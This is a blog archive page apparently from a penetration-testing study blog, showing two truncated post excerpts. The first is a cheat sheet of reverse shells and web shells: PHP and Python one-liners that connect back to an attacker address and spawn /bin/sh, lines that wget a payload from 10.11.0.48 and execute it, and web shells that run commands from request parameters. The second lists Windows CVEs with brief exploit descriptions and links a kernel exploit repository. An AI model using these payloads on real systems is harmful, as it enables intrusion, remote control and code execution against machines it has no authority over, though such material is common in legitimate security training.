Skip to main content

Posts

Showing posts from February, 2020

Reverse Shells & Web Shells

PHP Shells: echo '<?php $sock = fsockopen(" IP_ADDRESS ", PORT ); $proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>' > shell.php #This does not work this double quotes most of the times <?php system("whoami; wget http://10.11.0.48/shell; chmod +x shell; ./shell"); ?> <?php system("/usr/bin/wget 10.11.0.48:53/shell.txt -O /dev/shm/shell.php; php /dev/shm/shell.php"); ?> <? php -r '$sock=fsockopen("10.11.0.48",9001);exec("/bin/sh -i <&3 >&3 2>&3");' ?> <?php echo system($_REQUEST['cmd']); ?> <?php echo shell_exec($_GET['cmd']); ?> Get PHP Reverse Shell from here Python Reverse Shell python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((" IP_ADDRESS ", PORT ));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.filen

Windows Vulnerabilities - Listed

 Get The Kernel Exploits here --> https://github.com/SecWiki/windows-kernel-exploits OS Based on the version 10.0.14393 --> Windows Server 2016 10.0.17763 --> Windows Server 2019 [+] Windows vulnerabilities: Windows XP: CVE-2012-4349 Unquoted windows search path - Windows provides the capability of including spaces in path names - can be root CVE-2011-1345 Internet Explorer does not properly handle objects in memory - allows remote execution of code via object CVE-2010-3138 EXPLOIT-DB 14765 - Untrusted search path vulnerability - allows local users to gain privileges via a Trojan horse CVE-2011-5046 EXPLOIT-DB 18275 - GDI in windows does not properly validate user-mode input - allows remote code execution CVE-2002-1214 ms02_063_pptp_dos - exploits a kernel based overflow when sending abnormal PPTP Control Data packets - code execution, DoS CVE-2003-0352 ms03_026_dcom - exploits a stack buffer overflow in the RPCSS service CVE-200